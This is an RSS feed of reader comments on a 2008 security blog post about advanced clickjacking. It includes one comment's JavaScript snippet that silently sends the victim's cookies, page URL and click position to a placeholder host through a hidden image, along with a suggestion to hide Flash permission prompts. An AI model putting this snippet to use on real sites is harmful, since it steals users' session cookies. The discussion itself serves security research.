<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	>
<channel>
	<title>Comments on: More Advanced Clickjacking - UI Redress Attacks</title>
	<atom:link href="http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/</link>
	<description>Information Security Think Tank</description>
	<pubDate>Tue, 06 Jan 2009 02:51:18 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.7</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: un-excogitate.org &#187; Blog Archive &#187; It&#8217;s not a vulnerability when it&#8217;s a feature!</title>
		<link>http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/comment-page-1/#comment-124100</link>
		<dc:creator>un-excogitate.org &#187; Blog Archive &#187; It&#8217;s not a vulnerability when it&#8217;s a feature!</dc:creator>
		<pubDate>Sun, 19 Oct 2008 03:09:21 +0000</pubDate>
		<guid isPermaLink="false">https://www.gnucitizen.org/?p=1535#comment-124100</guid>
		<description>[...] tell they have found a legitimate use for UI Redressing (ref to RSnake, Jeremiah Grossman and the GNUCITIZEN mob). Just.. Wow! All the conflicting thoughts and emotions. I mean finally, I&#8217;ll have some [...]</description>
		<content:encoded><![CDATA[<p>[...] tell they have found a legitimate use for UI Redressing (ref to RSnake, Jeremiah Grossman and the GNUCITIZEN mob). Just.. Wow! All the conflicting thoughts and emotions. I mean finally, I&#8217;ll have some [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Clickjacking - The new threat?</title>
		<link>http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/comment-page-1/#comment-124027</link>
		<dc:creator>Clickjacking - The new threat?</dc:creator>
		<pubDate>Sun, 12 Oct 2008 11:25:07 +0000</pubDate>
		<guid isPermaLink="false">https://www.gnucitizen.org/?p=1535#comment-124027</guid>
		<description>[...] 2: A nice post from gnucitizen about [...]</description>
		<content:encoded><![CDATA[<p>[...] 2: A nice post from gnucitizen about [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: GNUCITIZEN - Advanced Clickjacking Explained</title>
		<link>http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/comment-page-1/#comment-123998</link>
		<dc:creator>GNUCITIZEN - Advanced Clickjacking Explained</dc:creator>
		<pubDate>Fri, 10 Oct 2008 13:02:21 +0000</pubDate>
		<guid isPermaLink="false">https://www.gnucitizen.org/?p=1535#comment-123998</guid>
		<description>[...] usual, GNUCITIZEN, and  Security Bloggers Network Member posts a superb analysis of advanced clickjacking. The GNUCITIZEN blog is today&#8217;s Infosecurity.US MustRead!   Sphere: Related [...]</description>
		<content:encoded><![CDATA[<p>[...] usual, GNUCITIZEN, and  Security Bloggers Network Member posts a superb analysis of advanced clickjacking. The GNUCITIZEN blog is today&#8217;s Infosecurity.US MustRead!   Sphere: Related [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: unwiredbrain</title>
		<link>http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/comment-page-1/#comment-123981</link>
		<dc:creator>unwiredbrain</dc:creator>
		<pubDate>Thu, 09 Oct 2008 16:29:00 +0000</pubDate>
		<guid isPermaLink="false">https://www.gnucitizen.org/?p=1535#comment-123981</guid>
		<description>&lt;strong&gt;pdp&lt;/strong&gt;, yeah, my biggest interest was pointing out that in the next HTML specification things about clickjacking will be easier than ever to set up.

The &lt;em&gt;where-victim-clicked&lt;/em&gt; stuff was my POC of your POC ;-) :-P</description>
		<content:encoded><![CDATA[<p><strong>pdp</strong>, yeah, my biggest interest was pointing out that in the next HTML specification things about clickjacking will be easier than ever to set up.</p>
<p>The <em>where-victim-clicked</em> stuff was my POC of your POC ;-) :-P</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: pdp</title>
		<link>http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/comment-page-1/#comment-123969</link>
		<dc:creator>pdp</dc:creator>
		<pubDate>Thu, 09 Oct 2008 06:54:30 +0000</pubDate>
		<guid isPermaLink="false">https://www.gnucitizen.org/?p=1535#comment-123969</guid>
		<description>the pocs are fully functional. they have been verified by a few close friends. 

unwiredbrain, you are absolutely right. I could have made the event bubble but a POC is a POC and nothing more :)</description>
		<content:encoded><![CDATA[<p>the pocs are fully functional. they have been verified by a few close friends. </p>
<p>unwiredbrain, you are absolutely right. I could have made the event bubble but a POC is a POC and nothing more :)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: gnucitizen reader</title>
		<link>http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/comment-page-1/#comment-123967</link>
		<dc:creator>gnucitizen reader</dc:creator>
		<pubDate>Thu, 09 Oct 2008 05:54:49 +0000</pubDate>
		<guid isPermaLink="false">https://www.gnucitizen.org/?p=1535#comment-123967</guid>
		<description>is it just me or any of your pocs are prepared to be functional?</description>
		<content:encoded><![CDATA[<p>is it just me or any of your pocs are prepared to be functional?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Mr.V</title>
		<link>http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/comment-page-1/#comment-123966</link>
		<dc:creator>Mr.V</dc:creator>
		<pubDate>Thu, 09 Oct 2008 02:54:23 +0000</pubDate>
		<guid isPermaLink="false">https://www.gnucitizen.org/?p=1535#comment-123966</guid>
		<description>I'm getting noscript's clicjacking warning every time I try to open google images :( help.</description>
		<content:encoded><![CDATA[<p>I&#8217;m getting noscript&#8217;s clicjacking warning every time I try to open google images :( help.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: mindcorrosive</title>
		<link>http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/comment-page-1/#comment-123965</link>
		<dc:creator>mindcorrosive</dc:creator>
		<pubDate>Wed, 08 Oct 2008 23:51:24 +0000</pubDate>
		<guid isPermaLink="false">https://www.gnucitizen.org/?p=1535#comment-123965</guid>
		<description>I never knew that it was *that* easy.. Though you could probably mask the suspicious Flash-UI "Allow" button with an UI element as well, for maximum user frustration..</description>
		<content:encoded><![CDATA[<p>I never knew that it was *that* easy.. Though you could probably mask the suspicious Flash-UI &#8220;Allow&#8221; button with an UI element as well, for maximum user frustration..</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: unwiredbrain</title>
		<link>http://www.gnucitizen.org/blog/more-advanced-clickjacking-ui-redress-attacks/comment-page-1/#comment-123963</link>
		<dc:creator>unwiredbrain</dc:creator>
		<pubDate>Wed, 08 Oct 2008 21:39:11 +0000</pubDate>
		<guid isPermaLink="false">https://www.gnucitizen.org/?p=1535#comment-123963</guid>
		<description>Little point of interest: an attacker could be very interested in &lt;strong&gt;where&lt;/strong&gt; the victim clicked.

I mean: placing the attack on multiple elements can give to the attacker informations about page "hot spots" i.e. where the people most commonly click, allowing them to profile a better attack, according to the user feedback.

Here's the code:
&lt;pre&gt;&lt;code&gt;var request = "http://www.example.com/collectingDataScript.jpg?l=" 
        + escape(document.location) + "&#38;c=" + escape(document.cookie) + "&#38;x=" 
        + c.x + "&#38;y=" + c.y;

var clickLogger = document.createElement("img");
    clickLogger.setAttribute("style", "position:absolute;left:-9999px;width:0;height:0;");
    clickLogger.setAttribute("src", request);&lt;/code&gt;&lt;/pre&gt;

If you're using Firebug, you'll see in the Net panel the requests the script makes.

Going a little further, in HTML 5 frames can send messages to each other [1], so there will be no more need to use a double click: the inline frame will only have to watch for messages from the hosting window!

[1] http://it.youtube.com/watch?v=xIxDJof7xxQ -- from 05:40 to 15:20</description>
		<content:encoded><![CDATA[<p>Little point of interest: an attacker could be very interested in <strong>where</strong> the victim clicked.</p>
<p>I mean: placing the attack on multiple elements can give to the attacker informations about page &#8220;hot spots&#8221; i.e. where the people most commonly click, allowing them to profile a better attack, according to the user feedback.</p>
<p>Here&#8217;s the code:</p>
<pre><code>var request = "http://www.example.com/collectingDataScript.jpg?l="
        + escape(document.location) + "&amp;c=" + escape(document.cookie) + "&amp;x="
        + c.x + "&amp;y=" + c.y;

var clickLogger = document.createElement("img");
    clickLogger.setAttribute("style", "position:absolute;left:-9999px;width:0;height:0;");
    clickLogger.setAttribute("src", request);</code></pre>
<p>If you&#8217;re using Firebug, you&#8217;ll see in the Net panel the requests the script makes.</p>
<p>Going a little further, in HTML 5 frames can send messages to each other [1], so there will be no more need to use a double click: the inline frame will only have to watch for messages from the hosting window!</p>
<p>[1] <a href="http://it.youtube.com/watch?v=xIxDJof7xxQ" rel="nofollow">http://it.youtube.com/watch?v=xIxDJof7xxQ</a> &#8212; from 05:40 to 15:20</p>
]]></content:encoded>
	</item>
</channel>
</rss>
